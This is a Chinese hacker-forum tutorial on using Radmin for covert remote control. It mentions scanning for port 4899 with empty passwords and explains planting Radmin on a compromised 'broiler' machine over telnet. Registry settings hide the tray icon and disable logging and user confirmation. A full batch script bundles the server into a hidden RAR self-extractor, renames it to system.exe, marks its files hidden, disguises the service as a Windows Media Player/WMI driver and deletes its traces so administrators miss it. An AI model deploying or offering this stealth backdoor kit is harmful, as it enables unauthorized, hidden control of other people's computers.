radmin远程控制技巧_WIN2003服务器维护_黑客防线网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

radmin远程控制技巧

作者:黑客防线网安网站维护基地 来源:黑客防线网安网站维护基地 浏览次数:0

本篇关键词:radmin远程控制技巧
黑客防线网安网讯:我用radmin,就是我可以看到他的桌面,但是用radmin的远程telnet就不能过去,直接用teleet就可以过去,还有一个就是怎么查看别人用radmin连接,我连别人嘛,扫到一个4899的空口令,我看他桌面就发现他正在看我的IP呢?

我用radmin,就是我可以看到他的桌面,但是用radmin的远程telnet就不能过去,直接用teleet就可以过去,还有一个就是怎么查看别人用radmin连接,我连别人嘛,扫到一个4899的空口令,我看他桌面就发现他正在看我的IP呢?

答:Radmin 是最快的远程控制软件它为低带宽的连接(如通过Modem)进行了专门的优化通过Modem连接时屏幕刷新次数可以达到每秒5-10次。如果通过局域网连接速度可以达到每秒100次,使你如同在本地一样进行实时操作。Radmin由Server和Client两部分组成。Server运行在被监控和管理的远程计算机上,它将该机的屏幕和键盘、鼠标控制交给在另一台计算机上的Client来控制
Client又称Viewer,运行在你的计算机上对远程的计算机进行控制
在Server和Client之间要求具有基于TCP/IP的连接。
  用radmin的远程telnet就不能过去原因:
首先检查是否能连接到远程计算机:ping 10.0.0.1
或者:ping 服务器域名
检查radmin server是否在正常运行。
检查相关的端口是否设置正确。
检查在远程计算机上是否有防火墙在工作。如果有防火墙,需要打开相应端口。
检查在远程计算机上是否设置了IP Filter,如果有,检查是否包括了本机的IP。
在Windows XP中,如果在服务器端设置了本机防火墙(网络连接- 属性- 高级),将无法建立连接。因此,需要打开相关端口(4899)或取消防火墙。

查看本机IP的方式:
可以使用以下任一种方式:
可以使用ipconfig命令:开始 – 运行 – 输入命令cmd – 在命令行窗口输入命令ipconfig,即可查看本机IP。
在Windows窗口的右下角工具条中会出现一个Radmin Server的图标,当鼠标在该图标上移动时,会显示出本机的IP。

 
 

关于 radmin 的远程安装教程

介绍 radmin 之前先说一下它的好处。我们平常所用的远程共用一个桌面的服务软件有DameWare NT ,VNC , Pcanywhere , Remote administrator 等。 DameWare 我感觉已经被淘汰了, 它的缺点太多,例如要依赖IPC$,日志记录等等。Pcanywhere 我没有研究过。VNC 最大的特点是跨平台,但缺点是隐藏图标的问题,我不会编程,当然无法去除图标,还有就是 VNC 功能很少。radmin 就不同了,它的特色有:速度快隐藏图标,COPY文件,telnet 等功能。安装也及其简单:
首先要在自己的机子上安装,在设置完端口,密码,隐藏图标后,从注册表导出

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin 起名为radmin.reg

内容大概如下:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"Port"=hex:64,19,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
"NTAuthEnabled"=hex:00,00,00,00
      "Parameter"=hex:c7,04,0d,72,74,b5,cb,03,f6,46,8e,ee,64,52,72,7b

解释一下 "DisableTrayIcon"=hex:01,00,00,00 里的01表示隐藏图标,改成00,图标就会显示 。"Port"=hex:当然是端口,这里是6500。 "Parameter"=hex:是密码。

其他的就不用管了。

现在我们将
AdmDll.dll
raddrv.dll
r_server.exe
radmin.reg

telnet 到肉鸡c:\winnt\system32\上执行:

regedit /s radmin.reg
r_server /install
net start r_server

马上连接即可,速度还不错。并且它还自带了ftp和telnet,在实际中有很大用处

 


RAdmin 服务端最新高级配置
我中意它。。没有办法  给大家说说我平时的radmin服务端嘀配置

为了方便安装。我们制作一个rar自解程序。你们应该会吧。。

我们建一个bat文件,内容如下:

net stop r_server

保存为1.bat文件。作用:以防万一

在建一个bat,内容如下:


@echo off
@system.exe /uninstall /silence
@system.exe /install /silence
echo Windows Registry Editor Version 5.00 > c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]>> c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]>> c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]>> c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]>>

c:\server.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]>>

c:\server.reg
echo "NTAuthEnabled"=hex:00,00,00,00>> c:\server.reg
echo

"Parameter"=hex:d8,50,b3,36,7e,c0,dd,79,ce,7e,dd,f2,11,6d,1f,f7>>

c:\server.reg
echo "Port"=hex:7a,00,00,00>> c:\server.reg
echo "Timeout"=hex:0a,00,00,00>> c:\server.reg
echo "EnableLogFile"=hex:00,00,00,00>> c:\server.reg
echo "LogFilePath"="c:\\logfile.txt">> c:\server.reg
echo "FilterIp"=hex:00,00,00,00>> c:\server.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> c:\server.reg
echo "AutoAllow"=hex:00,00,00,00>> c:\server.reg
echo "AskUser"=hex:00,00,00,00>> c:\server.reg
echo "EnableEventLog"=hex:00,00,00,00>> c:\server.reg>> c:\server.reg
@regedit /s c:\server.reg
@net start r_server
@attrib +r +h %systemroot%\system32\drivers\system.exe
@attrib +r +h %systemroot%\system32\drivers\admdll.dll
@attrib +r +h %systemroot%\system32\drivers\raddrv.dll
echo Windows Registry Editor Version 5.00 > c:\ip.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server] >>

c:\ip.reg
echo "Description"="为Windows Media Player提供加载进程及为其他的移动

媒体,驱动程序和库提供基层安全协议服务。">> c:\ip.reg

@regedit /s c:\ip.reg
@del c:\ip.reg /f /q
@del c:\server.reg /f /q

@sc config r_server displayname= "Windows Management Instrumentation

Player Drivers"
@del %systemroot%\system32\haha.exe /f /q
@del %systemroot%\system32\drivers\sc.exe /f /q
@del %systemroot%\system32\drivers\1.bat /f /q
@del %systemroot%\system32\drivers\2.bat /f /q

保存为2.bat文件 ,文件。。。。实际应用中注意:

1."Port"=hex:7a,00,00,00,换成你的radmin中reg文件中的相应内容,这个是

端口

2."Parameter"=hex:d8,50,b3,36,7e,c0,dd,79,ce,7e,dd,f2,11,6d,1f,f7这个

是密码。。换成相应的即可

3.其他默认,大家应该知道了。。我没有使用注册表,而是bat,原因(1.我喜

欢bat,嘿嘿。。。)

4.配置RAR高级自解压缩选项嘀时候。。注意那个解压路径 写成%systemroot%

\system32\drivers这个 
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入2.bat
步骤3 在『解压前运行』输入1.bat
步骤4 选择RAR高级自解压缩中的『模式』 改两个地方 选择『全部隐藏』和『

覆盖所有文件』

5.把你的r_server改名成system

6.RAR打包的时候不要忘记了SC这个程序

在上面我使用到了几个隐藏技巧。。

1.使用了attrib命令

2.利用注册表中的服务说明。。就是下面这一段
echo Windows Registry Editor Version 5.00 > c:\ip.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server] >>

c:\ip.reg
echo "Description"="为Windows Media Player提供加载进程及为其他的移动

媒体,驱动程序和库提供基层安全协议服务。">> c:\ip.reg

@regedit /s c:\ip.reg
@del c:\ip.reg /f /q

大家应该可以看懂

3.使用SC改变了r_server服务名

@sc config r_server displayname= "Windows Management Instrumentation

Player Drivers"

有了以上的几步。。很多管理员都不会查出来。。当然普通人更不会了

大家选择一个好的端口就行了。。。如果要替换服务。。自己加几个命令在

2.bat中就是了。。

优点:
1.在 系统服务 中看见的是Windows Management Instrumentation Player

Drivers  服务  (可以自定义)
2.服务说明是 提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全

协议服务
3.在cmd下面  使用net start 看见的自起动服务是Windows Management

Instrumentation Player Drivers
4.在进程中看见的是system(可以自定义,在2.bat文件中相应的地方改一下,

注意不要和已有的系统进程起冲突)

以上的程序。。SC,还有经过处理的RAdmin的服务端 

    黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-4972-1.html
网站维护教程更新时间:2011-04-11 03:23:35  【打印此页】  【关闭
我要申请本站N点 | 黑客防线官网 |  
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479

footer  footer  footer  footer